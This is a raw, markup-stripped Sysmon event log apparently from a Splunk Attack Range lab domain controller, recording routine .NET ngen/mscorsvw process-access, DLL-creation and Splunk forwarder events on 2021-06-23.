C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020826Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:29.243{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DD-60D3-D003-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020825Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:29.212{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1DD-60D3-D003-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020824Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:29.212{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DD-60D3-D003-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020823Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:29.165{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33E2F97387F65F9E8380DA7031AC94A0,SHA256=12DE876D89FEC97F0F30D501B2846825EB897751E78D86A2ABD545B598351D06,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000020822Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:29.088{4DB9351A-A1DC-60D3-CF03-00000000CF01}4192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1060-0\Microsoft.VisualBasic.Compatibility.dll2021-06-23 21:04:29.088 11241100x800000000000000020849Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:30.990{4DB9351A-A1DE-60D3-D503-00000000CF01}420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1a4-0\Microsoft.Windows.DeploymentServices.ServerManager.Plugin.dll2021-06-23 21:04:30.990 10341000x800000000000000020848Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:30.678{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DE-60D3-D503-00000000CF01}420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020847Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:30.662{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1DE-60D3-D503-00000000CF01}420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020846Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:30.662{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DE-60D3-D503-00000000CF01}420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 354300x800000000000000020845Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:28.313{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61426-false10.0.1.12-8000- 23542300x800000000000000020844Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:30.241{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=33B6DFFEDE53430BFA0D83FCB9E1817F,SHA256=FDC3EF513CF0FB5C44AD19933BC821103E82269EF61A104A18F71CF2A7AB64C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020843Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:30.194{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4088BC99651ADF05F50942B5F799476,SHA256=00AC18EF93F3FC1D0E90BEE0485E983871F13A7D06E9ADF89B41E917EBED713D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020842Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:30.087{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DE-60D3-D403-00000000CF01}3656C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020841Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:30.040{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1DE-60D3-D403-00000000CF01}3656C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020840Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:30.040{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DE-60D3-D403-00000000CF01}3656C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000020889Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.990{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DF-60D3-E003-00000000CF01}5288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020888Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.959{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1DF-60D3-E003-00000000CF01}5288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020887Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.959{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DF-60D3-E003-00000000CF01}5288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020886Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:31.944{4DB9351A-A1DF-60D3-DF03-00000000CF01}6080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\17c0-0\Microsoft.Windows.Diagnosis.Commands.WriteDiagProgress.dll2021-06-23 21:04:31.944 10341000x800000000000000020885Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.912{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DF-60D3-DF03-00000000CF01}6080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020884Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.897{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1DF-60D3-DF03-00000000CF01}6080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020883Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.897{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DF-60D3-DF03-00000000CF01}6080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020882Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.850{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DF-60D3-DE03-00000000CF01}5460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020881Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.834{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1DF-60D3-DE03-00000000CF01}5460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020880Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.834{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DF-60D3-DE03-00000000CF01}5460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020879Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:31.803{4DB9351A-A1DF-60D3-DD03-00000000CF01}2648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\a58-0\Microsoft.Windows.Diagnosis.Commands.UpdateDiagRootcause.dll2021-06-23 21:04:31.803 10341000x800000000000000020878Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.756{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DF-60D3-DD03-00000000CF01}2648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020877Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.740{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1DF-60D3-DD03-00000000CF01}2648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020876Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 